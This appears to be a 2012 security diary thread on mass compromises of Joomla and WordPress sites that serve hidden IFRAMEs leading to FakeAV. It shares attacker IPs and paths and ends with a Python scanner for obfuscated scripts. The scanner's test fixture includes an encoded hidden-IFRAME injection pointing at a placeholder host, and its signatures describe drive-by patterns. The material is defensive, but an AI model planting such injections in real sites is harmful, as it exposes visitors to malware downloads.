We've gotten some reports and discussion around many Joomla (and some WordPress) sites exploited and hosting IFRAMEs pointing to bad places. We'll get to the downloader in a second, but the interesting thing to note is that it doesn't seem to be a scanner exploiting one vulnerability but some tool that's basically firing a bunch of Joomla and WordPress exploits at a given server and hoping something hits. We'd like PCAPs or weblogs if you're seeing something similar in your environment.

Right now it seems the biggest pain is around Joomla users, particularly with extensions, which greatly increase the vulnerability footprint, and the one thing helping WordPress is the really nice feature of 1-button upgrades (and upgrades which don't tend to break your website).

The IFRAMEs seem to use rapidly changing FQDNs, but the common element is /nightend.cgi?8. Two of the bad IPs that seem to be frequent offenders are 78.157.192.72 and 108.174.52.38. Ultimately it pulls FakeAV software to do its badness.

Remediation is your typical advice: make sure all your software is up-to-date and kept that way on a regular basis. If you have weblogs (particularly verbose ones), I would be interested in seeing them. The tool being used is of interest to me.
-- John (262 Posts), ISC Handler, Dec 10th 2012
I have seen both IPs in my proxy logs and the common element is "nighttrend.cgi?8".
-- Jens (42 Posts), Dec 11th 2012
Have seen heavy WordPress admin login brute force attempts from 91.224.160.141 and 87.229.114.219.
-- Jeff (3 Posts), Dec 11th 2012
In a previous run-in (about 2 weeks ago) with Joomla-based website problems:
91.224.160.24, 177.1.78.7, 189.23.171.106, 177.43.64.140, 189.19.207.249, 177.43.160.197
-- CBob (23 Posts), Dec 11th 2012
Did you know which versions of WordPress are concerned?
-- CBob (1 Post), Dec 11th 2012
We've seen several names for the CGI itself, common element was "?8".
We have an extra eye on all requests to FQDNs containing one of changeip's domain names, since these seem to be used for malware sites quite often. According to our proxy logs, it looks like the ongoing Joomla/WP attack mainly utilizes the changeip domain "freewww.info". Does anybody know about other utilized domain names which are not part of the changeip pool? We are currently thinking about simply blocking all access to all changeip domain names in order to protect our clients.
-- snowprincess (1 Post), Dec 12th 2012
I haven't seen any bunch of exploit attempts on WordPress, but some specific attacks, which go to most of my WordPress sites.
Brute force to wp-login.php and wp-comments-post.php. Check this out: https://github.com/wpscanteam/wpscan/
-- snowprincess (1 Post), Dec 13th 2012
Most customers with hacked websites I've dealt with in the last few weeks had Joomla 1.5 with JCE Editor from 2011 (JCE bug was fixed in August 2011) installed.
This isn't a new exploit as far as I can see from logs - just renewed activity on the part of the hackers and more dangerous payload since the release of Blackhole Toolkit 2. The usual advice applies - apply all updates and patches as soon as they are released. Unfortunately the upgrade from Joomla 1.5 to 2.5 or 3.0 isn't very user-friendly!
-- Bruce Jackson, Austria (1 Post), Dec 13th 2012
I've seen something similar, I posted a blog entry back in November about it: http://www.my-audit.gr/hacking/new-joomla-infections-mustmoneyback-cgi/ First impression at that time was that it is PLESK related, but looking at the sites a bit more, most of them were old Joomla installations.
-- Bruce Jackson, Austria (1 Post), Dec 14th 2012
Drive-by attacks are very common at this moment; most often the IFRAME code written in JavaScript is obfuscated. I developed a tool in Python that scans the website and searches for malicious code in the scripts. Since the pattern in the malicious code is always changing, this tool allows adding new signatures to detect new patterns.
The script can be found at this URL: github.com/helderfernandes1279/webscriptscanner.
-- Bruce Jackson, Austria (1 Post), Dec 17th 2012
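The kind of signature-based scan the post above describes, as an added example written here and not the webscriptscanner tool itself: it peels off the cheap obfuscation layers drive-by injectors hide behind (unescape-style %XX, \xHH and \uHHHH escapes, String.fromCharCode() number lists, HTML entities) and re-runs a small signature list after each layer, so an IFRAME that only appears after decoding is still found and reported with the depth at which it surfaced. The signature list and the sample pages are constructed for the example, and malicious.example is a placeholder host.

```python
import html
import re

# Signature list; append new (name, regex) pairs as injector patterns change.
SIGNATURES = [
    ("hidden-iframe", re.compile(
        r"<iframe[^>]*(?:(?:width|height)\s*=\s*[\"']?0(?!\d)|visibility\s*:\s*hidden)", re.I)),
    ("nightend-cgi", re.compile(r"/night(?:end|trend)\.cgi\?8", re.I)),   # path from this thread
    ("document-write-unescape", re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("fromcharcode", re.compile(r"String\.fromCharCode\s*\(", re.I)),
]


def _hex_char(m):
    return chr(int(m.group(1), 16))


def _from_char_code(m):
    return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))


def decode_layer(text):
    """Undo one layer of the simple encodings injected scripts usually hide behind."""
    out = re.sub(r"%([0-9a-fA-F]{2})", _hex_char, text)          # JS unescape / URL encoding
    out = re.sub(r"\\x([0-9a-fA-F]{2})", _hex_char, out)         # \x3c
    out = re.sub(r"\\u([0-9a-fA-F]{4})", _hex_char, out)         # \u003c
    out = re.sub(r"String\.fromCharCode\s*\(([\d\s,]+)\)", _from_char_code, out)
    return html.unescape(out)                                    # &lt;iframe ...


def scan(content, max_layers=5):
    """Map signature name -> shallowest decoding depth at which it matched."""
    findings = {}
    layer = content
    for depth in range(max_layers + 1):
        for name, rx in SIGNATURES:
            if rx.search(layer):
                findings.setdefault(name, depth)
        nxt = decode_layer(layer)
        if nxt == layer:          # nothing left to decode
            break
        layer = nxt
    return findings


# Constructed sample pages (not captured from any real site).
SAMPLE_PAGE = (
    "<html><body><h1>Welcome</h1>\n"
    "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fmalicious.example"
    "%2Fnightend.cgi%3F8%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));</script>\n"
    "</body></html>"
)
FROMCHARCODE_PAGE = "<script>eval(String.fromCharCode(60,105,102,114,97,109,101,32))</script>"
CLEAN_PAGE = "<html><body><p>100% plain text, no scripts.</p></body></html>"

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("fromcharcode", FROMCHARCODE_PAGE), ("clean", CLEAN_PAGE)):
        print(label, scan(page) or "no findings")
```

Reporting the depth is useful in triage: a hidden IFRAME that only shows up at depth 1 or deeper was deliberately encoded, which is a stronger signal than the same tag sitting in plain HTML.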